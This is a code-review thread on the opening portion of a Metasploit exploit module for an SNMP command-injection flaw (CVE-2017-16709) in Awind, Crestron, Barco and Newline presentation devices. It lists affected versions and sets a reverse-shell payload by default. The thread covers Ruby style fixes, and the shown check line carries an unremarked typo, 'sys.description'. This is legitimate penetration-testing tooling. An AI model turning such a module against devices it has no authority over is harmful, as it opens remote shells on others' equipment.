modules/exploits/linux/snmp/awind_snmp_exec.rb

```diff
@@ -0,0 +1,168 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'openssl'
+require 'base64'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::SNMPClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "AwindInc SNMP service command injection",
+      'Description'    => %q{
+        This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection.
+        A valid SNMP read-write community is required to exploit this vulnerability.
+
+        The following devices are known to be affected by this issue:
+
+          * Crestron Airmedia AM-100 <= version 1.5.0.4
+          * Crestron Airmedia AM-101 <= version 2.5.0.12
+          * Awind WiPG-1600w <= version 2.0.1.8
+          * Awind WiPG-2000d <= version 2.1.6.2
+          * Barco wePresent 2000 <= version 2.1.5.7
+          * Newline Trucast 2 <= version 2.1.0.5
+          * Newline Trucast 3 <= version 2.1.3.7
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Quentin Kaiser <kaiserquentin[at]gmail.com>'
+        ],
+      'References'     =>
+        [
+          ['CVE', '2017-16709'],
+          ['URL', 'https://github.com/QKaiser/awind-research'],
+          ['URL', 'https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/']
+        ],
+      'Platform'        => 'unix',
+      'Targets'         => [ [ 'Universal', {} ] ],
+      'Privileged'     => true,
+      'DefaultOptions' =>
+      {
+         'SSL' => false,
+         'PAYLOAD' => 'cmd/unix/reverse_openssl'
+      },
+      'Arch'  => [ ARCH_CMD ],
+      'Payload' =>
+      {
+        'Compat' =>
+        {
+          'PayloadType' => 'cmd',
+          'RequiredCmd' => 'openssl'
+        }
+      },
+      'DisclosureDate' => "Mar 27 2019",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('COMMUNITY', [true, 'SNMP Community String', 'private']),
+      ])
+  end
+
+
+  def check
+    begin
+      connect_snmp
+      sys_description = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
+      print_status("Target system is #{sys_description}")
+      # AM-100 and AM-101 considered EOL, no fix so no need to check version.
+      if sys_description.include? "Crestron Electronics AM-100" or sys.description.include? "Crestron Electronics AM-101"
+        return Exploit::CheckCode::Vulnerable
+      end
```

Comment:
Shrink this down to one line (unless officer RuboCop gets mad): 
```ruby
return Exploit::CheckCode::Vulnerable if sys_description.include? "Crestron Electronics AM-100" or sys.description.include? "Crestron Electronics AM-101"
```

Also probably want to replace `or` with `||`

Reply:
See https://github.com/rapid7/metasploit-framework/pull/11643/commits/fbaebc14be3d0dff23cf1ef5d1a6bb4feeecd028

Reply:
`||` is preferred over `or`, which requires using `()` for the `include?()` calls.

A regex would decrease line length and duplication:

```ruby
return CheckCode::Vulnerable if sys_description =~ /Crestron Electronics (AM-100|AM-101)/
```

Also, `Exploit::` prefix is redundant in `Exploit` context.

Reply:
See https://github.com/rapid7/metasploit-framework/pull/11643/commits/8ec5a124b4e023deb051049dedc8dba366b7bccc